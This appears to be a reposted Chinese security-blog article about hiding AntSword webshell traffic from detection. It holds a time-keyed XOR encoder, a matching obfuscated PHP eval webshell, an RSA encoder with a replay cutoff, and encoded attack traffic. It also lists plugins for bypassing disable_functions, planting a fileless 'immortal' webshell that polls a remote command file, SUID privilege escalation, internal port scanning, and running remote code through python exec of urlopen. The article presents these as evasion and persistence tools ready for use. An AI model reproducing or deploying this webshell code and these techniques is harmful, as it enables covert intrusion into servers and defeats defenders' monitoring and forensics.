d0xqRWlMQ0FpSWl3Z0lpSXNJQ0l0WW5ZaUtUdDlmU0JsYkhObElIdHlaWFIxY200Z1JtRnNjMlU3ZlNSdmRYUndkWFFnUFNCQVptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pIUnRjQ2s3UUhWdWJHbHVheWdrZEcxd0tUdHBaaUFvSkc5MWRIQjFkQ0FoUFNBaUlpa2dlM0J5YVc1MEtDUnZkWFJ3ZFhRcE8zSmxkSFZ5YmlCVWNuVmxPMzE5Y21WMGRYSnVJRVpoYkhObE8zMDdablZ1WTNScGIyNGdjblZ1WTIxa0tDUmpLWHNrY21WMFBUQTdKR1E5WkdseWJtRnRaU2drWDFORlVsWkZVbHNpVTBOU1NWQlVYMFpKVEVWT1FVMUZJbDBwTzJsbUtHWmxLQ2R6ZVhOMFpXMG5LU2w3UUhONWMzUmxiU2drWXl3a2NtVjBLVHQ5Wld4elpXbG1LR1psS0Nkd1lYTnpkR2h5ZFNjcEtYdEFjR0Z6YzNSb2NuVW9KR01zSkhKbGRDazdmV1ZzYzJWcFppaG1aU2duYzJobGJHeGZaWGhsWXljcEtYdHdjbWx1ZENoQWMyaGxiR3hmWlhobFl5Z2tZeWtwTzMxbGJITmxhV1lvWm1Vb0oyVjRaV01uS1NsN1FHVjRaV01vSkdNc0pHOHNKSEpsZENrN2NISnBiblFvYW05cGJpZ2lDaUlzSkc4cEtUdDlaV3h6WldsbUtHWmxLQ2R3YjNCbGJpY3BLWHNrWm5BOVFIQnZjR1Z1S0NSakxDZHlKeWs3ZDJocGJHVW9JVUJtWlc5bUtDUm1jQ2twZTNCeWFXNTBLRUJtWjJWMGN5Z2tabkFzTWpBME9Da3BPMzFBY0dOc2IzTmxLQ1JtY0NrN2ZXVnNjMlZwWmlobVpTZ25jSEp2WTE5dmNHVnVKeWtwZXlSd0lEMGdRSEJ5YjJOZmIzQmxiaWdrWXl3Z1lYSnlZWGtvTVNBOVBpQmhjbkpoZVNnbmNHbHdaU2NzSUNkM0p5a3NJRElnUFQ0Z1lYSnlZWGtvSjNCcGNHVW5MQ0FuZHljcEtTd2dKR2x2S1R0M2FHbHNaU2doUUdabGIyWW9KR2x2V3pGZEtTbDdjSEpwYm5Rb1FHWm5aWFJ6S0NScGIxc3hYU3d5TURRNEtTazdmWGRvYVd4bEtDRkFabVZ2Wmlna2FXOWJNbDBwS1h0d2NtbHVkQ2hBWm1kbGRITW9KR2x2V3pKZExESXdORGdwS1R0OVFHWmpiRzl6WlNna2FXOWJNVjBwTzBCbVkyeHZjMlVvSkdsdld6SmRLVHRBY0hKdlkxOWpiRzl6WlNna2NDazdmV1ZzYzJWcFppaG1aU2duWVc1MGMzbHpkR1Z0SnlrcGUwQmhiblJ6ZVhOMFpXMG9KR01wTzMxbGJITmxhV1lvY25WdWMyaGxiR3h6YUc5amF5Z2taQ3dnSkdNcEtTQjdjbVYwZFhKdUlDUnlaWFE3ZldWc2MyVnBaaWh6ZFdKemRISW9KR1FzTUN3eEtTRTlJaThpSUNZbUlFQmpiR0Z6YzE5bGVHbHpkSE1vSWtOUFRTSXBLWHNrZHoxdVpYY2dRMDlOS0NkWFUyTnlhWEIwTG5Ob1pXeHNKeWs3SkdVOUpIY3RQbVY0WldNb0pHTXBPeVJ6Ynowa1pTMCtVM1JrVDNWMEtDazdKSEpsZEM0OUpITnZMVDVTWldGa1FXeHNLQ2s3SkhObFBTUmxMVDVUZEdSRmNuSW9LVHNrY21WMExqMGtjMlV0UGxKbFlXUkJiR3dvS1R0d2NtbHVkQ2drY21WMEtUdDlaV3h6Wlhza2NtVjBJRDBnTVRJM08zMXlaWFIxY200Z0pISmxkRHQ5T3lSeVpYUTlRSEoxYm1OdFpDZ2tjaTRpSURJK0pqRWlLVHR3Y21sdWRDQW9KSEpsZENFOU1Day9JbkpsZEQxN0pISmxkSDBpT2lJaU96dDlZMkYwWTJnb1JYaGpaWEIwYVc5dUlDUmxLWHRsWTJodklDSkZVbEpQVWpvdkx5SXVKR1V0UG1kbGRFMWxjM05oWjJVb0tUdDlPMkZ6YjNWMGNIVjBLQ2s3WkdsbEtDazc%3D&s01f4f3921efb4=bf&x7121316358fb9=A0Y21k
流量完全混淆
将流量进行两次base64解码即可得到原本数据
基于时间基于时间的动态密钥编码器
'use strict'; //基于时间的蚁剑动态秘钥编码器 //link :https://yzddmr6.tk/posts/antsword-xor-encoder/ //code by yzddmr6 /* 服务端 <?php date_default_timezone_set("PRC"); @$post=base64_decode($_REQUEST['yzddmr6']); $key=md5(date("Y-m-d H:i",time())); for($i=0;$i<strlen($post);$i++){ $post[$i] = $post[$i] ^ $key[$i%32]; } eval($post); ?> */ module.exports = (pwd, data, ext={}) => { function xor(payload){ let crypto = require('crypto'); Object.assign(Date.prototype, { switch (time) { let date = { "yy": this.getFullYear(), "MM": this.getMonth() + 1, "dd": this.getDate(), "hh": this.getHours(), "mm": this.getMinutes(), "ss": this.getSeconds() }; if (/(y+)/i.test(time)) { time = time.replace(RegExp.$1, (this.getFullYear() + '').substr(4 - RegExp.$1.length)); } Object.keys(date).forEach(function (i) { if (new RegExp("(" + i + ")").test(time)) { if (RegExp.$1.length == 2) { date[i] < 10 ? date[i] = '0' + date[i] : date[i]; } time = time.replace(RegExp.$1, date[i]); } }) return time; } }) let newDate = new Date(); let time = newDate.switch('yyyy-MM-dd hh:mm'); let key = crypto.createHash('md5').update(time).digest('hex') key=key.split("").map(t => t.charCodeAt(0)); //let payload="phpinfo();"; let cipher = payload.split("").map(t => t.charCodeAt(0)); for(let i=0;i<cipher.length;i++){ cipher[i]=cipher[i]^key[i%32] } cipher=cipher.map(t=>String.fromCharCode(t)).join("") cipher=Buffer.from(cipher).toString('base64'); //console.log(cipher) return cipher; } data['_'] = Buffer.from(data['_']).toString('base64'); data[pwd] = `eval(base64_decode("${data['_']}"));`; data[pwd]=xor(data[pwd]); delete data['_']; return data; }
此编码器的作用是将时间的md5值设置为key进行异或操作通过base64传输,shell获取到编码后的数据时先base64解密后再通过时间的md5进行一次异或解密得到明文
对应的webshell
<?php header('HTTP/1.1 404'); class COMI { public $c=''; function __destruct() { return eval(substr($this->c, 0)); } } date_default_timezone_set("PRC"); $comi = new COMI(); $password = &$password1; $password1 = $_REQUEST['x']; $post = &$password; $post=base64_decode($post); $key=md5(date("Y-m-d H:i",time())); for($i=0;$i<strlen($post);$i++){ $post[$i] = $post[$i] ^ $key[$i%32]; } $lnng1 = &$lnng; $lnng = $post; $lnng2 = $lnng1; @$comi->c = substr($lnng2, 0); ?>
b581dec526a568=EYY2QgL2QgIkQ6L3BocHN0dWR5X3Byby9XV1cvcGlrYWNodS92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMiJndob2FtaSZlY2hvIGYwNDI5OWUmY2QmZWNobyAxODI2MWM4ZGY4OTM%3D&n08d50c7fefb55=4AY21k&u909700452f2fe=xp&x=UhUHDk1aBBEEDwZpUVcBDVJXThUwJFpDUTIMGT49ZV5%2BDjQSBgsnEThhXlBvaigbVAEsTSgKQVF5DnQKLzFAcFRRMFI9CzcSA25kUFd1DhZXajdYLCBdAXojDBQ%2BIlhIZzYkEgdVCQQ7C2QGfnEoFFV1MEI5UXxeU1ZjCAU9fVh8NxISP1ECCQMKcF1UaisSf3oVXANReAVqIAQIBT1%2BRG40Vw4uezcENAlkZWNZNDFhSyxjMFJ8fGUiZwU2Dlh8ZTZTIDFtMAs5alkBf3VbFW9qLE4xO3RPajNRBQdWdkJWOzcNPFUjGDttawZtADAObwBfXDswUV9kLEVTKyANQXgnVgsuaxIJAwpwXVRqKxJ5AiRfAg18XlUyDBQAPXpefCA0FAZ%2FIxsCUEVdVwAsUWxxHk0EO3hQalZjUzxWZl1VOyQEP38JGyp6WUZ6ADgUVV8wXzhRUVl6IwwUPT1%2BSH4kIBgsezcSBX5kQn5hIFVXZT9YKDZ0RlNVDFAHCFgBbjQsET9rAgkAYWBaV2EJElMAKEEDDWRGUgpjDytWBAZ9KzQWP38JGzFqYEZRdTQWelsvQS0JewJ%2BHmxTPiF5BHkZKwsqCCcWAAtgRlZbBQlSdVdcADt%2FRn9WWQ4vJnJwbQ4KET9uXA4Efl5MUXovDXx6NEM7JFpPezdZVD1XDURTJAoXAW8wVQdqYAZXZTASVVhXTjs0cEVTI3NTBSZTWlMkVwkEYCwSLglwXFR1MBJVWwFcBSQHXVE8fBMrVXZBVQ4KBAYKM1IqenhAVnU0F24ALF8CUWBdUTx8CigmdVh7ClILLmwWCTgLBwZsaigbZmckQAIOYFhoV3sUBiJYAXwgLxQ9fh0BOXFKVXlLWgt6cTQHAzRkRlMNXlQ%2BCA1IfCA0EjVsJFUrflkOVgAOVGxlX1oqIGRcUgpnCwcLfUF4GjQSLkEWEgQJcFxUdTASVVsBXi0KAl97MEFaK1V2QVUOCgQGCjNSKnp4QFZ1NBduACxfAlFgXVE8fAooJn1HfgoNVTRwLxY7fl5PfnEwUlRlNEcCCl0BaQp%2FDz0yRwZRNxJbKkIRDwVuB1xRdQ4UVFskXwJRYENpHVIIBlZiAXw7Egk8YDcOOQtgWm9fJFNUejRRBSRaQmo8RRUGCGJXVFEwUi57LzM0Un9ffmYRCVcAMAIxNAddfjddCD09Zl18ICw4KW9VFjt6cH96XwkLeno0RwM0Y1l7N14TK1duR1QKAQkEbFUVLkBgRmV6LFJVXx5bAwpRXVJXY1MvMUdaVjAVEC5gFgkDCmQGYkswEm5hJw4oIGRAVDxnAS4iWFV%2BJVIFL38RDgRvQV1UYTcYe15WAAc7fFpULGMaBgx2cG4OIBg%2FbDxSOQtkQ2wAWwlsYQFcA1BgBnswQVorV24AVQ4oUgRvXBcofnRMVwE0UlV6MAcqIFoBeiMMUgAtdgBTJ1cUPFRcDDthYFBsAFsXUnUwQgUre1l7MEEVPQkNXVUONAQ8Ch0OOG4GWX5mFg5vAA5BKCB8Wn0zZFM9D31YewovFSgKKBgvU39fegA0CFd1XlAwJHBMajMACS8mZkdTOzQVAWA0Ei4LZFxUdVoFf1gFBigKAl99IHxQLQ9ACFVRLAQGCzcKAldjWX5mFlJVXAoAKyt3D2kJcxk%2BMW0Bb1E0DjwKXAk7alpMUWUoGFJ6L1grJQ9nZFV7NjMcfkR6Jw4JK2wnCC8LaFpvXytTeGEsUy0nf0Z7MEYIBx8FWG47KA4rUjcEO35kXFcAMA59eigGOA14BlMNUgg8VHZhYlI0ACxVLFMufXRdb2UvU3tYPF8vN28CeQgFECkMX0F4GjQOB1Y%2FGAVxew9kdSgKVQAzBS8lD11qM3sVPiJhXlRQMAsGCzcbKnpgUGB3WzZgdBVeBTddQX8wVhQpIWUAeg4%2FGz9VMAs5akVPfmEJVXx1Nw47JFpPUglzFz42U1pvUigkMFQ%2FJDRVQV9gAiwxZWQkYjlTbHxkIWMsNTAFd34PVhIqQTcIMWF8B2xcLFJVWwFcOyBBQXwgcBM0MQRYexovTSxRVAgof0VfUEswGFBkEV4oCVlffFZ4BDwmfgZ9KyhbPXssCy4LXlt%2BeixTb1woBwIKUV1qJ0IUKCFxQWc3VgspQSwSBAlwQVFqMA5UXD9YKA90dGYhUlotDAFfbTs0DgdWPA0oVXB0Y3cFC31hUl4uCg8HU1d8FQYiDVtuNBEUBgovEgNTXUBRaiwbegAeQThRcEV8Vn8TBg9bR1M7KBspCysLAG4GAHkBNBhVW19eADQCAHxXewoFMgAHe1EsEgdRLBIuCgNaV3osDlMCJEAFO2RaUgpsDC0JdnNhJgFbLFFQDDthYFpXXDsNf14kdTcmUV97NwEKK1V5B3tSAhIHVTcUBQp%2FQFYBDhhSdTBDLBl%2FAWEeWhUyV1hEbSRfUQZBXDYEYXxuYQMBUHh2EnMuCg9uUTMACAZWUEt4UytUKQkBEgNUYEBRAS8UYwEKTQUkYEJ9HnwVMldYRG0kX1EGCScUBQtkT2AACg5UdRFBBQlzQ30nDVQtDF8GUTQKDy57Iw4DYXAGUGEFCWxlUwUCUGRPezdZVC4iYkRTDiAbBlJUDgRxcEVXADAOfXEsDwcrTl5TVk0TBghiCVErEQspeyQJO24HBFYBMBt9ZhJaA1B8WmkzewwvJmZdVQ08CgZWLAU4YX9Rf3o7En96Ekc7CndZeTNjFwctZgR8IDRQLmsOBQQJcEFRajAOVFw%2FWAJQZE9oV38PByJMWW5RMw0sVh1aB350TFQANFdQeh4PKApBUXkOBQooJnVaUwoNEioLVFsHamBPZWEoVXx6JA4oK0VdaVcFCitXbgBVDihSBG9cFyh%2BaFp%2BcTAPfWoVXDsnB1pVLHcQBldmXXwgLxEsUR0jAG4HRm0ABg5ScQFeOyRaTGkzfxA%2BMw1cUzRTCAF%2FCRQDV39ffmEJVVdlP1g7NAdBVCxeDC4iZUF8OxUJP3xUCgJXeF5QYQUSeQFXWwMreFpVHWcINDJySFQOIFc9ClQKAnpVWFF6KBJUYQVEODt8T2k8WQUGMnJGfCACGAFwL1IDC0pAUQA0G3xLEVw7IF1Gf1cEGj49ZgBUDlINP1YzFzgKYEZXAFcEbGoORwJQZEx7J2cOLzZtXFY7KAQ8CiMRA350X1d1Nw18dT9HKwpvXlEzAAU9PX5IbjsNDS9%2FPBErfmNGfmYWW3kAPAYDDngGUTMMFi0tfgBVDSgNP28dEQILWkBsABENfHU3RCggZFx7N3dUBTJtVnwrKFM8VitSAlBVXW9xFQV7cRFQLDBdUWAwBQQtDAxYfiA%2FDyx%2FPw4qelZBUWowDlRcP1kqMHdbeg10DD4IYV59UTAbBlVcGzkLSkBvSwESf3oeDygkbFp7J1EXPTJYQn0aDRIuaydVAG5rUX56LFJVXCgHAgpeT2ozcwgGIlhEVhoBCykKLxIDUAtMVHErEnpxJ144DnBMUSd8Ey0mcQh%2BJjwgMX4rJCpqcAF%2FejAWVXEnDigrZFpSPHcWPTIEXlRQChg9CgEOBX8LBm9lUxVuADRHAgpRRnwndA09PXlffDcSFQFgNw4DV2tZfF4gK2N0X3o1U0EPeydeBAEcdgV4GiRbKkEkCThAcx1%2FejAWVXEnTjEKb055DV5UBTJtVnwkPA4uewEOAld4QFZeWxFUAAVZKjBdUVVWYxoHCA1Ib1EeFD9BAgs4antFfHYnEnkBVlA7NE5Majd3VAYyckFVIAELPG0kGixTUUN4cVYVelgjXi0gd195DUIELQx9Qn4gLxY8VjwLKm1GD1NhIA5UeihbKCtCT2o8Z1IHCABWZQ4gEQYKMFUHamBAUWowFVJqN1AxMHR3aglZED4zDV9tOzQEPApcFwV%2BZENRei8NfHo0QwIgXQFhLGMWBiJYRFYaAQkBf1QVKm1GRm9bIw18dV8GBSt0B1QndAs0NnVYfgoNBQALJxsAbgcGfnEwFFJqNEAFO2dGf1d%2FDwAtYkhVCiQ3BlYzDi4KAw9WXzRSUmosQigmbF5SLHsPK1YEBm0NMBc8CzcSAwsGUVZcNBdvAFdcKiBkXHs8RggHCGIBZzcnVS9%2FNFs7fl5PV18kFmxhAVw5UnhwZQhvJTEJR1hiUygxNm4nNzkJaHxhdzQtZ2dXcSgPBkZ%2FVlkOLyJuXXwgAhgAYCtSO24CWH5hDlVneigCAlBkWlI3Ugg9HENaVA4wUi5sEVs7bkpMb2UOD311PFsqIFJBaTx7GQAiXEhTMAUSLmARIwJ%2BdExWATANVVwzWCske0V6LH8PACZfBlE0MBEGCjMSO1BaW29hBQxVAA5bAyROUGo8XQ89HFdBfDsSFQZVCRcFelp3VgAKDlR1HlE7O15aaR1SCD0cX0F4UFcOB3ArDgBua1lvXzcNfAAwAzs0e1h7N1lUNSJiBW00Kw0vfygRK34KRX96KA5ScQ0AAit8RlIKZAwFCA1BVQoBCyZRLBErfgpGfmYWW2xlHk07NFpbeyNvDy8mUEZVUCQOB1EGEiphQV1vXCNbZ3okQQIkYEN7J2cJKCZQSH0aDVUBCg0SA35nWXxnIA9sZV9aKiBkW1MnXhMBVnZIVjRTUi59Jw87C2QGVksFCWxcJ0QsCXcGfydeEytWBXBUJCgRBwsrDip6YFtWcQlVUGUwRAJRYEZqDV0OPjZTX1QrLBQ8CVwUAn5kQ39LCRJTSzRAKCcGUWEsdxoGV3pXVVAkDgdRAgk4QEVRbGooG29qDVgsMHcPYA13CwcLfllSMAEMBn8JFTtqUUV8cQZRfEsNRCgnf1FgMAEEPT1%2BSG47DQ0vCycSAn5nWHlxIwxSSwVHKjBBUXojWRUvMUACViQKET9rAgowfmhaVwA7DXx1CkE2GXBSezdZVActfkFVDTcNNH8%2FDDthYEx%2BcTASVAMVTzkwQU99IGRXLzZfBlE7Ag0Ebx0OKnp0d29fNBRsWwFcADQPVH0IBRMvPUBGVA4KFwF7DSM7VFZaUXovDXx1CkE2GXxSfCB8FCohU0F8NxJbNH8%2FCAN%2BC0xvYQUJV2VfVSw1BkZ%2FVHcOPVdMR1RRMw0vfwkUNkN4Un5mFiNVeixBOFIPXFIjDBk%2BNlNaVCANVQNvMxECC2RGb1sKD2xhAVk4NAMGU1dZGQAiYkV9Gg0SAAgnCgNXYExQaixSbGVWWCske0Z%2FVwQPBi16XVY0Pw0GVjMXAgtaWld1GhhXdV9dABpRXWonQgQuInlBfDAkVQZVM1IFYXhDfHEwG2xqNwAHNGBFU1ZjEz4MXEtTNCwYAXAsDSt%2BY0V4cRUafWEjDigKDl95J2wOLSB2W1UkIBgGCVwOBH5eTFF6Lw1%2FWShnNTB%2FRns8RggAHwVEbTsFBTQIXCwqelZuYAAsG1dqJActDXhZajNNEC4cXwZ9JDNbL3AGFjFUZAJvZS8NfHUrRy4aZExSHgUIPjYEGmJQNAkxCzNSKnpZAX96KA5ScVIOKyt4QHwwADA%2BMnJaZjQeES57DlUrcXxaZWEwDnpmU2MFJGRwUwp8DC8xR1pUDjBSKVJVCQILZ0JlXigOb2U0dQMkQVl7MEEUBwhYRFMgAQkGVTNSKm1GD29lGhhsahVcAg5gBnkgBQQpMX0CeFBXGz9gN1MCVAZRf3ooDlJ2Eg4uGmRPajxkWjUtfgBVDigWP3sCCQJQBl98ditJfFgjXio3QkFTCVkWACZ1Xn0rLA4BeyBbLHpZGXxcKA5SdlcAKyt8WlQsBQorDH1YeBkSWzwKI1I4C1VZZ2oKCGxqJAcANA9DeSdnDy89QF1uUQ4ULHsvJDRVeGZgWA0UeksvQiskY0JgCVEPACAFXVRQKAo%2FCjANKm1GD3oAJBhUATAHAitgBnsnXlQ%2BIlhdfCANVUcRTFk%3D
此时已经检测不出什么敏感流量
并且使用基于时间混淆的好处在于如果在后期想要利用重放来得到这段代码执行的操作也是不可实现的,因为对应的时间已经不一致了,这样一来便彻底无法知道该段代码的具体操作是什么。
RSA编码器
蚁剑版本高于2.1的才支持针对php的RSA算法
RSA的思路也就是利用非对称加密的方式,先用私钥将传输的内容进行加密,然后传输给shell后,shell通过公钥进行解密,从而实现对流量的混淆,RSA的实现原理在这里不再叙述,但是使用RSA编码器需要前提条件,也就是需要开启openssl模块
/** * php::RSA编码器 * Create at: 2021/03/02 15:27:33 */ 'use strict'; /* * @param {String} pwd 连接密码 * @param {Array} data 编码器处理前的 payload 数组 * @return {Array} data 编码器处理后的 payload 数组 */ module.exports = (pwd, data, ext={}) => { data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`; let n = Math.ceil(data['_'].length / 80); let l = Math.ceil(data['_'].length / n); let r = [] for (var i = 0; n > i; i++) { r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64')); } data[pwd] = r.join("|"); delete data['_']; return data; }
data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
在编码器中加入此代码,来设置数据的时效性。过了5秒后该数据失效,变为die
蚁剑插件介绍
将插件目录拷贝至 antSword/antData/plugins/
目录下即安装成功
-
as_bypass_php_disable_functions
突破 disable_functions 执行系统命令,绕过 Open_basedir 等安全机制
-
AS_BugScan
创建 BugScan 节点插件,通过 WebShell 创建BugScan节点
使用
在终端下直接输入
python -V
如果有输出,你可以继续进行,如果提示找不到python
, 请先将python
添加至环境变量中。访问 BugScan 进入扫描器。点击添加任务,在
节点
子栏下获取你个人的创建节点链接。假如在页面显示的为:
python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5
那么在本插件 URL 部分应该填写
urlopen
函数部分中的 URL:http://t.cn/Rqu1SmB?xxxxxxx
最大任务数` 输入框中控制一个节点能接受的最大目标数,默认为 5
点击开始即可尝试创建 BugScan 节点。创建成功后,在 BugScan 添加任务页面即可看到你的节点。
-
在
虚拟终端
下检查Python2.7
是否在环境变量中
-
-
as_jwtdebugger
AntSword JWT 调试插件
-
as_messycoderecover
尝试恢复乱码, 并非所有乱码都可以被完美恢复,乱码中的问号说明该字符已经丢失,是无法恢复的
-
as_netstat
AntSword 查看网络连接状态插件
-
as_plugin_godofhacker
黑客神器,谁用谁知道!
-
as_plugin_import_shell_from_csv
从 CSV 中 批量导入 Shell
-
AS_Redis
AntSword Redis 管理插件, 需要 AntSword >= 2.0.3
-
as_scanwebshell
通过正则匹配,查找后门 webshell
-
as_webshell_venom
webshell-venom 蚁剑版
-
check_rwx-suid
1、在目标服务器上查询可读可写可执行目录以及可用于suid提权的文件(支持windows环境下的asp,aspx以及linux环境下的php)
2、asp以及aspx类型的shell以上传独立的detect.asp(x)文件来实现对应操作(点击"用户"按钮后会弹出确认框,确认后即可在服务器上生成此文件),生成成功后只需访问webshell目录下的detect.asp(x),输入欲检测的范围并执行即可
-
GenShell
AntSword 生成 Shell插件,根据用户输入密码或随机产生密码,生成 Shell
-
inject_und3ad
向目标服务器植入不死php webshell
点击左上角远程文件按钮,输入远程控制文件地址以及轮询时间(以秒为单位),点击确定即可(分隔符为###)
For example : http://192.168.134.128/1.txt###60 每60秒轮询一次http://192.168.134.128/1.txt里的内容
文件内容类似于
file_put_contents('./1.php','<?php @eval($_POST[xxy]); ?>)
; (密码可自定义,路径也可自定义,此文件内容旨在每隔一段时间写入一个小马)上述旨在利用php特性植入不死webshell,在执行完成后,此webshell会基于用户设置的轮询时间向用户设置的远程文件地址发送请求,用户只需在远程地址的txt文档中输入想要执行的命令即可。
此webshell在执行后会自身删除,驻留内存之中,无文件残留
清除办法包括重启web服务等
用户在植入不死webshell后,远程控制文件地址将会被记录,在第二次打开此界面时会在下方"历史远端控制文件"中看见
-
LiveScan
AntSword Webshell存活弹出插件
1、通过请求 Webshell 并判断返回数据是否一致判断 Webshell 是否存活
2、仅对 PHP,ASP,ASPX 有效
3、一键将失联的 Webshell 移动到 [.Trash]分类
4、一键清空[.Trash]分类
-
PortScan
AntSword 端口扫描插件,通过 WebShell 对内网中的服务器的指定端口进行扫描
-
SuperTerm
AntSword 创建交互式终端插件,通过 WebShell 创建一个交互式终端
-
ExecScript
AntSword 执行自定义脚本,在目标主机上执行php、asp、aspx 自定义的脚本
插件:
链接:https://pan.baidu.com/s/1w3fW4721OALvClGoULSc3g
提取码:0117
原文始发于微信公众号(深度网络安全实验室):蚁剑的流量混淆和插件合集【武装 启动!】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论